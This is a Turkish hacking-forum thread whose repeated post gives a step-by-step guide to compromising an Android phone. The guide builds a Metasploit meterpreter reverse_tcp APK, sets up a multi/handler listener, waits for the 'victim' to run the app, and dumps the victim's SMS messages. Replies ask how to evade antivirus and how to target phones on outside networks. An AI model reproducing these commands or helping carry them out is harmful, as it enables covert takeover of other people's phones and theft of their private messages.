Kali Linux Android Telefona Sızma

Skrsky1

Üye
21 Haz 2021
143
27
23
Adım 1 : İlk olarak terminalimizi açıyoruz ve aşağıdaki komutları yazıyoruz .

Komut ; msfpayload android/meterpreter/reverse_tcp LHOST= ip adresiniz (ifconfig komutu ile öğrenebilirsiniz LPORT= hangi port üzerinden yapmak istiyorsanız R > /root/Desktop/isim.apk . ( nereye kaydetmek istiyorsanız path bölümünde orayı belirtiyorsunuz. ) ve dosya oluşturuldu bakalım masa üstümüze.

rM4ypV.png


Adım 2 : msfconsole komutu ile exploit aracımız çalıştırıyoruz ve aşağıdaki komutu yazıyoruz .

Komut ; use multi/handler .

6PBMG3.png


Adım 3 : Burada ise aşağıdaki kodları yazıyoruz .

Komut ;

> set payload android/meterpreter/reverse_tcp
> show options
> set LHOST 192.168.1.1 ( ip adresinizi yazıyorsunuz linux makinanızın)
> set LPORT 4444 ( belirlediğiniz port adresini yazıyorsunuz )
> exploit ( kurbanın yazılımı çalıştırması ile root satırına geçmeyi bekliyoruz.)

v5Gylp.png


Adım 4 : Ve kurban yazılımı çalıştırarak bize yetki göndermiş durumda

XkGljj.png


Adım 5 : Burada ise telefon içerisinde yapılabilecek bütün işlemerin komutlarını görüntülemek için help komutunu kullanıyoruz . Sağ tarafta hangi komutun ne işe yaradıgını bize açıklamakta.

RkAG4a.png


Adım 6 : Örnek olarak telefondaki SMSlere bakalım . Bunun için dump_sms komutunu kullanıyoruz.

v5GyDp.png


Adım 7 : Dosyamızı root klasörüne kaydetiyor. Şimdi ismine göre hangi dosyaysa açalım.

rM4yDz.png


Adım 8 : Ve SMSleri görüntüledik . Kim göndermiş , kurban kime göndermiş , numara , tarih , açıklama , mesaj vb ayrıntıları görüntüledik .
 

Skrsky1

Üye
21 Haz 2021
143
27
23
Adım 1 : İlk olarak terminalimizi açıyoruz ve aşağıdaki komutları yazıyoruz .

Komut ; msfpayload android/meterpreter/reverse_tcp LHOST= ip adresiniz (ifconfig komutu ile öğrenebilirsiniz LPORT= hangi port üzerinden yapmak istiyorsanız R > /root/Desktop/isim.apk . ( nereye kaydetmek istiyorsanız path bölümünde orayı belirtiyorsunuz. ) ve dosya oluşturuldu bakalım masa üstümüze.

rM4ypV.png


Adım 2 : msfconsole komutu ile exploit aracımız çalıştırıyoruz ve aşağıdaki komutu yazıyoruz .

Komut ; use multi/handler .

6PBMG3.png


Adım 3 : Burada ise aşağıdaki kodları yazıyoruz .

Komut ;

> set payload android/meterpreter/reverse_tcp
> show options
> set LHOST 192.168.1.1 ( ip adresinizi yazıyorsunuz linux makinanızın)
> set LPORT 4444 ( belirlediğiniz port adresini yazıyorsunuz )
> exploit ( kurbanın yazılımı çalıştırması ile root satırına geçmeyi bekliyoruz.)

v5Gylp.png


Adım 4 : Ve kurban yazılımı çalıştırarak bize yetki göndermiş durumda

XkGljj.png


Adım 5 : Burada ise telefon içerisinde yapılabilecek bütün işlemerin komutlarını görüntülemek için help komutunu kullanıyoruz . Sağ tarafta hangi komutun ne işe yaradıgını bize açıklamakta.

RkAG4a.png


Adım 6 : Örnek olarak telefondaki SMSlere bakalım . Bunun için dump_sms komutunu kullanıyoruz.

v5GyDp.png


Adım 7 : Dosyamızı root klasörüne kaydetiyor. Şimdi ismine göre hangi dosyaysa açalım.

rM4yDz.png


Adım 8 : Ve SMSleri görüntüledik . Kim göndermiş , kurban kime göndermiş , numara , tarih , açıklama , mesaj vb ayrıntıları görüntüledik .

WkzozE.png
hocam anti virüse takılıyor bunun önüne nasıl geçerim
 

Aratalp

Yeni üye
16 Tem 2020
4
0
Adım 1 : İlk olarak terminalimizi açıyoruz ve aşağıdaki komutları yazıyoruz .

Komut ; msfpayload android/meterpreter/reverse_tcp LHOST= ip adresiniz (ifconfig komutu ile öğrenebilirsiniz LPORT= hangi port üzerinden yapmak istiyorsanız R > /root/Desktop/isim.apk . ( nereye kaydetmek istiyorsanız path bölümünde orayı belirtiyorsunuz. ) ve dosya oluşturuldu bakalım masa üstümüze.

rM4ypV.png


Adım 2 : msfconsole komutu ile exploit aracımız çalıştırıyoruz ve aşağıdaki komutu yazıyoruz .

Komut ; use multi/handler .

6PBMG3.png


Adım 3 : Burada ise aşağıdaki kodları yazıyoruz .

Komut ;

> set payload android/meterpreter/reverse_tcp
> show options
> set LHOST 192.168.1.1 ( ip adresinizi yazıyorsunuz linux makinanızın)
> set LPORT 4444 ( belirlediğiniz port adresini yazıyorsunuz )
> exploit ( kurbanın yazılımı çalıştırması ile root satırına geçmeyi bekliyoruz.)

v5Gylp.png


Adım 4 : Ve kurban yazılımı çalıştırarak bize yetki göndermiş durumda

XkGljj.png


Adım 5 : Burada ise telefon içerisinde yapılabilecek bütün işlemerin komutlarını görüntülemek için help komutunu kullanıyoruz . Sağ tarafta hangi komutun ne işe yaradıgını bize açıklamakta.

RkAG4a.png


Adım 6 : Örnek olarak telefondaki SMSlere bakalım . Bunun için dump_sms komutunu kullanıyoruz.

v5GyDp.png


Adım 7 : Dosyamızı root klasörüne kaydetiyor. Şimdi ismine göre hangi dosyaysa açalım.

rM4yDz.png


Adım 8 : Ve SMSleri görüntüledik . Kim göndermiş , kurban kime göndermiş , numara , tarih , açıklama , mesaj vb ayrıntıları görüntüledik .

WkzozE.png
Eline sağlık ustad birde dış ağdaki telefona nasıl sizilir bununla ilgili iceriginiz varmi?
 

Butcherb3y

Uzman üye
1 Eyl 2022
1,484
1,118
Anıtkabir
Adım 1 : İlk olarak terminalimizi açıyoruz ve aşağıdaki komutları yazıyoruz .

Komut ; msfpayload android/meterpreter/reverse_tcp LHOST= ip adresiniz (ifconfig komutu ile öğrenebilirsiniz LPORT= hangi port üzerinden yapmak istiyorsanız R > /root/Desktop/isim.apk . ( nereye kaydetmek istiyorsanız path bölümünde orayı belirtiyorsunuz. ) ve dosya oluşturuldu bakalım masa üstümüze.

rM4ypV.png


Adım 2 : msfconsole komutu ile exploit aracımız çalıştırıyoruz ve aşağıdaki komutu yazıyoruz .

Komut ; use multi/handler .

6PBMG3.png


Adım 3 : Burada ise aşağıdaki kodları yazıyoruz .

Komut ;

> set payload android/meterpreter/reverse_tcp
> show options
> set LHOST 192.168.1.1 ( ip adresinizi yazıyorsunuz linux makinanızın)
> set LPORT 4444 ( belirlediğiniz port adresini yazıyorsunuz )
> exploit ( kurbanın yazılımı çalıştırması ile root satırına geçmeyi bekliyoruz.)

v5Gylp.png


Adım 4 : Ve kurban yazılımı çalıştırarak bize yetki göndermiş durumda

XkGljj.png


Adım 5 : Burada ise telefon içerisinde yapılabilecek bütün işlemerin komutlarını görüntülemek için help komutunu kullanıyoruz . Sağ tarafta hangi komutun ne işe yaradıgını bize açıklamakta.

RkAG4a.png


Adım 6 : Örnek olarak telefondaki SMSlere bakalım . Bunun için dump_sms komutunu kullanıyoruz.

v5GyDp.png


Adım 7 : Dosyamızı root klasörüne kaydetiyor. Şimdi ismine göre hangi dosyaysa açalım.

rM4yDz.png


Adım 8 : Ve SMSleri görüntüledik . Kim göndermiş , kurban kime göndermiş , numara , tarih , açıklama , mesaj vb ayrıntıları görüntüledik .

WkzozE.png
Elinize sağlık
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.